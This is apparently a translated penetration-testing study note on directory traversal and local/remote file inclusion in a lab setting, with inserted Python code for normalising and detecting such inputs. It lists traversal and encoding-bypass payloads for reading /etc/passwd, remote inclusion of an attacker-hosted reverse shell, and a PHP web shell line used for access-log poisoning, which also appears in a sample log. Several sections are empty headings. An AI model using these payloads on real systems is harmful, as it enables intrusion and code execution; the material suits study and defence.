Manual Vulnerability Mining
Vulnerability types
#Directory Traversal    "read files on the target machine's operating system"
Through the browser / URL address or a parameter's value, a user can read files outside the Web root directory "default: /var/www/", i.e. other operating system files (such as /etc/passwd). Root cause: directory permissions are not strictly restricted
#File Inclusion    "1. Local File Inclusion (LFI); 2. Remote File Inclusion (RFI) (a Trojan/webshell can be passed in)"
Typically via a function such as include, which can include files from directories outside the Web root. Root cause: the include function does not restrict its input variable
#The exploitation methods and resulting effects of these two vulnerability types are exactly the same.
Note: Kali integrates some attack-vector wordlists by default, under /usr/share/wfuzz/wordlist/vulns
##################################################################
By default, Metasploitable only has the local file inclusion vulnerability, not remote file inclusion
#Modify the Metasploitable configuration file
sudo vi /etc/php5/cgi/php.ini
/allow_url    #search (in vi) for the allow_url_include directive and turn it on
sudo /etc/init.d/apache2 restart    #restart the Apache service
##########################################################################
Exploitation
First, observe the features and characteristics of the form or the URL address, "such as: page=a.php home=b.html file=content"
Classic test methods
/etc/passwd    a file that can be read by an ordinary user, often used for testing
1. file=./../../../etc/passwd
Explanation: both Windows and Linux have two special directory entries
.      represents the current directory
../    indicates the parent of the current directory (one level up)
The more "../" the better, because they take you up to the root directory and any extra ones are simply ignored once you are there
#An absolute path can also be used directly: ?page=/etc/passwd, but then the directory traversal vulnerability itself is not exercised; for that you need "../"
2. ?page=file:///etc/passwd    "file-system access; the absolute path of the file is required after file://, e.g. /etc/passwd"
3. home=main.cgi    "read source code / configuration information, etc."
4. page=http://www.a.com/1.php    (includes a file from another web server) "Remote file inclusion"
You can set up your own web server and place a reverse shell on it
?page=http://1.1.1.1/../../../../dir/file.txt
Encoding bypasses character filtering
When the response says "cannot find the file", you can infer that a filtering mechanism is in place
Before PHP 5.3 the following bypass of the restriction existed
"%00" (null byte; generally valid, denotes a control character) "in PHP's handling of the string, when %00 is encountered everything after it is ignored"
For example: ?file=a.doc%00.php
Try a variety of encodings "every character can be encoded; usually ASCII codes below 128 are not filtered"
Special characters: "." "/"    #plain English letters will certainly not be filtered
######################################################################
#Path characteristic characters of different operating systems
#UNIX-like systems
Root directory: /
Directory-level delimiter: /
#Windows systems
Root directory: C:\
Directory-level delimiter: \ or /
######################################################################
Encoding
Most commonly used: URL encoding "if one layer of encoding is not enough to bypass, use double or multi-layer URL encoding, provided that the server decodes the result"
Goal: the target server still decodes the encoding normally and returns the content requested, while the filter is bypassed
%2E%2E%2F          decodes to: ../
%2E%2E%5C          decodes to: ..\
%252E%252E%255C    decodes to: ..\  "double-layer encoding: the special character % is itself encoded as %25"
Unicode / UTF-8    "non-English character encodings"
..%C0%AF    decodes to: ../ (overlong UTF-8 form of /)
..%u2216    (%u-style Unicode encoding; U+2216 is a backslash-like character)
..%C1%9C    decodes to: ..\ (overlong UTF-8 form of \)
#Online tools can be used
######################################################################################
Other characters that may be usable in system paths
?file.txt...           #trailing dots
?file.txt<spaces>      #trailing spaces
?file.txt"""           #trailing quotes
?file.txt<<<>>><
?./././file.txt
?nonexistant/../file.txt    #enter a nonexistent directory "many operating systems already filter this"
UNC path "Windows file share"
?\\1.1.1.1\path\to\file.txt
Note: the common characters can be encoded in advance and combined pairwise or in any combination into a dictionary file; using it with Burp Suite's Intruder improves efficiency
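As an added example (not from the original note), the following Python normaliser applies the decoding layers discussed above to a path parameter (multi-layer URL encoding, overlong UTF-8, %u encoding, null-byte truncation), classifies what the decoded value would reach, and shows the hardened check that confines the result to the web root. The lookalike table, the /var/www root and the classification labels are this example's own assumptions.

```python
import posixpath
import re
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 byte sequences for "/" and "\" (the ..%C0%AF and ..%C1%9C tricks above).
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}
# Unicode characters that look like path separators (%u2216 is SET MINUS, %u2215 DIVISION SLASH).
LOOKALIKE = {"\u2216": "\\", "\u2215": "/"}
WEB_ROOT = "/var/www"  # default web root quoted in this note (assumed)


def normalize(raw, max_rounds=5):
    """Decode until the value stops changing (so %252E becomes %2E, then '.'),
    then apply PHP's pre-5.3.4 null-byte truncation and unify separators."""
    s = raw
    for _ in range(max_rounds):
        s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
        data = unquote_to_bytes(s)
        for seq, plain in OVERLONG.items():
            data = data.replace(seq, plain)
        decoded = data.decode("utf-8", "replace")
        if decoded == s:
            break
        s = decoded
    s = s.split("\0", 1)[0]                 # 'a.doc%00.php' -> 'a.doc'
    for char, plain in LOOKALIKE.items():
        s = s.replace(char, plain)
    return s.replace("\\", "/")             # treat Windows and UNIX separators alike


def classify(raw):
    """Name the attack class a path parameter matches after normalisation, or None."""
    path = normalize(raw)
    if re.match(r"^[a-z][a-z0-9+.-]*://", path, re.I):
        return "remote or file:// inclusion"       # http://..., file:///etc/passwd
    if path.startswith("//") or re.match(r"^[a-z]:/", path, re.I):
        return "UNC or drive-absolute path"        # \\1.1.1.1\share\..., C:\...
    if ".." in path.split("/"):
        return "directory traversal"
    if path.startswith("/"):
        return "absolute path"
    return None


def resolve_inside_root(raw, root=WEB_ROOT):
    """Hardened lookup: canonicalise the decoded path and refuse anything outside root."""
    target = posixpath.normpath(posixpath.join(root, normalize(raw)))
    if target != root and not target.startswith(root + "/"):
        return None
    return target
```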
######################################################################################
Exception: nothing suspicious is visible in the URL; the parameter is carried in the Cookie of the HTTP request header
Code:
Attack: "the injection point is the cookie value"
Results:
Note: every variable must be validated
##########################################################################################
Example demo
Local File Inclusion (LFI)
Viewing files
Code execution "special case: achieving code injection through the server's access log"
<?php echo shell_exec($_GET['cmd']); ?>
Apache access.log    "premise: other users have read permission on the file"
Then access the file through the browser
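Added example, not from the original note: a detector that parses Apache combined-format access.log lines and flags the two stages of the technique just described, a PHP tag being written into the log (via request line, referer or user-agent) and a later request that includes the log file. The log lines, client addresses and the /var/log/apache2/access.log path are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache combined log format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')
PHP_TAG = re.compile(r"<\?(php|=)", re.I)                      # code written into the log
TRAVERSAL = re.compile(r"(\.\.|%2e%2e)(/|\\|%2f|%5c)", re.I)   # ../ after one decoding layer
LOG_FILE = re.compile(r"(access|error)[._]log", re.I)           # the poisoned log being included

# Constructed sample: a normal request, a traversal probe, the PHP tag being planted in the
# log via the request line, and the inclusion of the log itself (Debian's log path assumed).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=main.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:57:12 +0000] "GET /<?php echo shell_exec($_GET['cmd']); ?> HTTP/1.1" 404 210 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:58:40 +0000] "GET /index.php?page=../../../../var/log/apache2/access.log HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""


def analyse_line(line):
    """Return (client, [findings]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = {k: unquote(v) for k, v in m.groupdict().items()}  # one decoding layer
    findings = []
    for name in ("request", "referer", "agent"):                # all three end up in the log
        if PHP_TAG.search(fields[name]):
            findings.append(f"php tag in {name}")
    if TRAVERSAL.search(fields["request"]):
        findings.append("traversal in request")
    if "=" in fields["request"] and LOG_FILE.search(fields["request"]):
        findings.append("request includes a log file")
    return fields["host"], findings


def analyse_log(text):
    """Return [(client, findings)] for every line that raised at least one finding."""
    hits = []
    for line in text.splitlines():
        parsed = analyse_line(line)
        if parsed and parsed[1]:
            hits.append(parsed)
    return hits
```

The same client first probing with "../", then planting a PHP tag, then including the log is the sequence to alert on; each finding alone is only a weak signal.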
###############################################################
Note: on a Linux system, when assigning permissions to a file, make sure the same permissions are assigned to the directories along its path, otherwise the file cannot be reached
###############################################################
Remote File Inclusion (RFI) "compared with local inclusion, lower probability"
Verification:
Harm:
Low level
Medium level
Bypass idea: "the filter is applied only once"
1. Encoding
2. Mixed characters
High level: restricted
Little White Diary 37: Kali Penetration Testing - Web Penetration - Manual Vulnerability Mining (iii) - Directory Traversal, File Inclusion